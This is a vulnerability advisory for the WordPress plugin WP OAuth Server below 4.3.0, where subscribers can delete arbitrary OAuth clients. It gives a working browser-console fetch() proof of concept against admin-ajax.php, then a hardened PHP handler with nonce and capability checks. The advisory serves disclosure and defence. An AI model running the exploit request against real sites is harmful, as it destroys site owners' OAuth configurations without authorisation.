wpexploit | Lana Codes | WPEX-ID:BE9B25C8-B0D7-4C22-81FF-E41650A4ED41
History: Feb 21, 2023 - 12:00 a.m.

WP OAuth Server < 4.3.0 - Subscriber+ Arbitrary Client Deletion

2023-02-21 00:00:00
Lana Codes
60
Tags: wordpress, security, oauth server, arbitrary client deletion, developer console, command, exploit

EPSS: 0.001 (Low), percentile 20.0%

The plugin has a flawed CSRF and authorisation check when deleting a client, which could allow any authenticated user, such as a subscriber, to delete an arbitrary client.

Run the command below in the developer console of the web browser while on the blog as any authenticated user, such as a subscriber; this will delete the client with ID 123.

fetch('/wp-admin/admin-ajax.php', {
    method: 'POST',
    headers: new Headers({
        'Content-Type': 'application/x-www-form-urlencoded',
    }),
    body: 'action=wo_remove_client&client_id=123',
    redirect: 'follow'
}).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));
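The root cause described above is an admin-ajax handler that deletes a client without verifying a nonce or checking the caller's capability. The following is an added example of what a hardened handler for the same `wo_remove_client` action looks like; it is not the plugin's own code or its actual fix. The handler name `wo_remove_client_hardened`, the storage function `wo_delete_client_by_id()`, the script handle `wo-admin` and the choice of the `manage_options` capability are assumptions made for illustration.

```php
<?php
/**
 * Added example, not WP OAuth Server's own code: a hardened admin-ajax handler
 * for the "wo_remove_client" action. It requires both a valid nonce (CSRF check)
 * and the manage_options capability (authorisation check) before deleting anything.
 */

// Register only the logged-in variant; the wp_ajax_nopriv_ hook is deliberately
// not registered, so anonymous requests never reach this code.
add_action( 'wp_ajax_wo_remove_client', 'wo_remove_client_hardened' );

function wo_remove_client_hardened() {
    // CSRF check: the request must carry a nonce issued for this action.
    // check_ajax_referer() terminates the request if the nonce is missing or stale.
    check_ajax_referer( 'wo_remove_client', 'nonce' );

    // Authorisation check: a subscriber is authenticated but must not manage clients.
    // Without this line, any logged-in user with a nonce could still delete clients.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // Validate the identifier before touching storage.
    $client_id = isset( $_POST['client_id'] ) ? absint( wp_unslash( $_POST['client_id'] ) ) : 0;
    if ( 0 === $client_id ) {
        wp_send_json_error( array( 'message' => 'Invalid client ID.' ), 400 );
    }

    // Hypothetical deletion routine (assumed name); a real plugin would call its own storage layer here.
    $deleted = wo_delete_client_by_id( $client_id );
    if ( ! $deleted ) {
        wp_send_json_error( array( 'message' => 'Client not found.' ), 404 );
    }

    wp_send_json_success( array( 'deleted' => $client_id ) );
}

// Hand the nonce to the admin page script (assumed handle "wo-admin") so that
// legitimate delete requests from the plugin's own UI can include it.
add_action( 'admin_enqueue_scripts', function () {
    wp_localize_script(
        'wo-admin',
        'woRemoveClient',
        array( 'nonce' => wp_create_nonce( 'wo_remove_client' ) )
    );
} );
```

With this handler in place, a request like the one in the proof of concept above fails twice over: it carries no `nonce` field, so `check_ajax_referer()` rejects it before any logic runs, and even a request that somehow obtained a nonce would be refused with HTTP 403 when issued by a subscriber. A legitimate administrator request from the plugin's own page sends `action=wo_remove_client`, `client_id` and the localized `nonce` together. In WordPress, the nonce and the capability check are complementary: the nonce ties the request to a user session and action, while `current_user_can()` decides whether that user is allowed to perform the action at all.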
